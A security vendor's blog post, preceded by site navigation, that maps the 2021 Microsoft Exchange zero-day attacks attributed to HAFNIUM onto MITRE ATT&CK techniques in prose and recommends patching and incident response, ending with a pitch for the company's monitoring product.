Research | Our Q3 report details what's new in the world of ransomware.
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
Threat Advisories
The latest threat research report from ReliaQuest Threat Research research team.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
November 30, 2023
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
More results...
Note: This blog is a part of our MITRE ATT&CK Mapping series in which we map the latest major threat intelligence incidents to the MITRE ATT&CK framework. You can view similar postings such as Mapping MITRE ATT&CK to the DPRK Financial Crime Indictment, Compromised RDP Sales, or Sandworm’s APT Campaign.
On 02 March 2021, Microsoft released an advisory to discuss the detection of multiple zero-day exploits used to compromise on-premises versions of Microsoft Exchange Server. Microsoft Exchange Server is a mail, calendaring, and collaboration platform mainly designed by Microsoft for business use. The observed attacks exploited four previously-unseen vulnerabilities in Microsoft’s product to access corporate email addresses and install external software to maintain persistence in the victim environment.
Microsoft initially attributed the attacks detected to HAFNIUM, a threat actor assessed to be supported and operating from the People’s Republic of China. This highly sophisticated actor traditionally conducts its operations from Virtual Private Servers (VPS) located in the United States. HAFNIUM primarily targets organizations in the US across various industry verticals, such as think tanks, infectious disease researchers, defense contractors, and educational institutions for the purpose of exfiltrating information. However, subsequent analysis of the zero-day exploits observed revealed that multiple threat actors (some say more than ten) were abusing unpatched versions of Microsoft Exchange Server.
While the zero-day exploits story is still unfolding, it is crucial to analyze how threat actors have proceeded to compromise vulnerable versions of Microsoft Exchange Server. Although Microsoft published the appropriate patches last week, initial estimates place the number of compromised organizations to 30,000 with many more servers still needing protections. As security teams will need to prioritize patching and investigating this compromise in the coming weeks, let’s dive into the tactics, techniques, and methods used by threat actors to exploit these four zero-day vulnerabilities by mapping MITRE ATT&CK to the Microsoft Exchange exploit.
Digital Shadows (now ReliaQuest) will continue to update this blog as new details of this malicious operation emerge. In the meantime, mapping the MITRE ATT&CK framework to the information disclosed by Microsoft about this sophisticated campaign is useful to understand the modus operandi of the threat actors involved and better protect your organization against potential threats. Without further ado, let’s pack our compasses and adventure shoes and begin this orienteering exercise.
T1595 – Active Scanning
Attackers have been actively scanning the internet to find on-premise Microsoft Exchange Server versions able to receive unwarranted external connections on port 443. According to Volexity, the attackers only need the external IP address or domain name of a publicly available Exchange server to leverage the zero-day vulnerabilities and gain unauthorized access to the targeted environment. This technique cannot be easily mitigated as it involves behaviors that cannot be controlled by security tools; however, by applying Microsoft’s patches, organizations probably won’t be targeted as the attackers will likely focus on the vulnerable ones.
T1190 – Exploit Public-Facing Application
T1078 – Valid Accounts
There are two main ways to gain access to a Microsoft Exchange Server: either through stolen valid account credentials or by leveraging zero-day vulnerabilities to appear as a legitimate and authorized user. CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allows attackers to send specially crafted HTTP requests and authenticate as the Exchange server. This vulnerability can be exploited remotely and does not require any particular knowledge of the target environment. In the observed attacks, this vulnerability was often chained to other zero-days that allowed attackers to run code as SYSTEM on Exchange.
T1072 – Software Deployment Tools CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 are also being leveraged to allow Remote Code Execution (RCE) on targeted systems. These post-authentication vulnerabilities enabled the attackers to write a file on the server’s path and perform additional malicious actions on the Exchange servers. This capability may be used to move laterally through the network, extract valuable information, and deploy further malware in the system. In this specific scenario, attackers were often found using web shells to gain continued access in the victim environment.
T1505.003 – Server Software Component: Web Shell
According to MITRE, “Adversaries may backdoor web servers with web shells to establish persistent access to systems”—and that’s exactly what attackers did in the observed operations. By deploying web shells on the compromised servers, the attackers create a persistent way into the network that allows them to perpetrate a series of actions, including credential theft, data exfiltration, lateral movement, hands-on-keyboard activity, and deployment of additional payloads.
T1041 – Exfiltration over C2 channel
Among all the actions that can be enabled via web shells, establishing command and control (C2) is undoubtedly one. According to the reports on the campaigns leveraging those four zero-day exploits, the threat actors likely used this connection to steal email data from an organization’s network. However, since reports are emerging claiming that more than ten threat actors were leveraging these vulnerabilities, the post-exploitation TTPs likely varied depending on the actor behind the operation.
Along with the details of the exploited zero-days vulnerabilities, Microsoft published security updates that should be immediately applied by every organization using Exchange in their corporate environments. We’re well aware that patching communication software can be pain for business continuity, but promptly applying these patches can go a long way in protecting organizations from nation-state and criminal actors ready to exploit these public vulnerabilities. Digital Shadows (now ReliaQuest) has already observed chatter in high-profile Russian-language criminal forums discussing the potential presence of Proof of Concepts (PoCs) exploiting zero-day vulnerabilities CVE-2021-26855 and CVE-2021-27065.
It’s worth noting at this point that if your company has already been backdoored, these patches won’t actively remove the malicious web shells, and the server likely needs to be rebuilt entirely. Microsoft made a nMap script to scan for evidence of exploited vulnerabilities in your environment. Investigating for exploitation, persistence, or evidence of lateral movement can highlight traces of an effective intrusion before the patches were applied. If that’s the case, you’re now in incident response mode.
Cybercriminals can leverage installed backdoor web shells to deploy malicious payloads (i.e. ransomware) on victim environments. If the cybercriminal group is financially-motivated, they will likely attempt to deploy ransomware to fully capitalize on these vulnerabilities. Additionally, compromised Exchange servers can be a virtual doorway into the rest of the victim’s network, thus leaving cybercriminals and nation-state actors free to roam undisturbed.
It’s fundamental to stay updated on the latest vulnerabilities and security updates related to this high-profile exploit. As more details emerge, Digital Shadows (now ReliaQuest) will continue to update this post with additional analysis and recommendations in addition to delivering intelligence updates to our clients. Having an in-house or outsourced Cyber Threat Intelligence (CTI) team can quickly identify trends and listings relevant to your organization. This practice can help security teams prioritize the most vulnerable areas, thus granting a more robust security posture.
If you’d like to get a clear picture of your attack surface, SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) aggregates data from billions of sources across the open, deep, and dark web, giving you a view of your exposure in real-time. Unlike other threat intelligence providers, Digital Shadows (now ReliaQuest) focuses on high-priority, actionable alerts as they relate to genuine threats to the business. Get a demo request of SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) here
For existing clients, Digital Shadows (now ReliaQuest) recommends the following Shadow Search (now ReliaQuest GreyMatter Digital Risk Protection) queries for updates on developments of this event: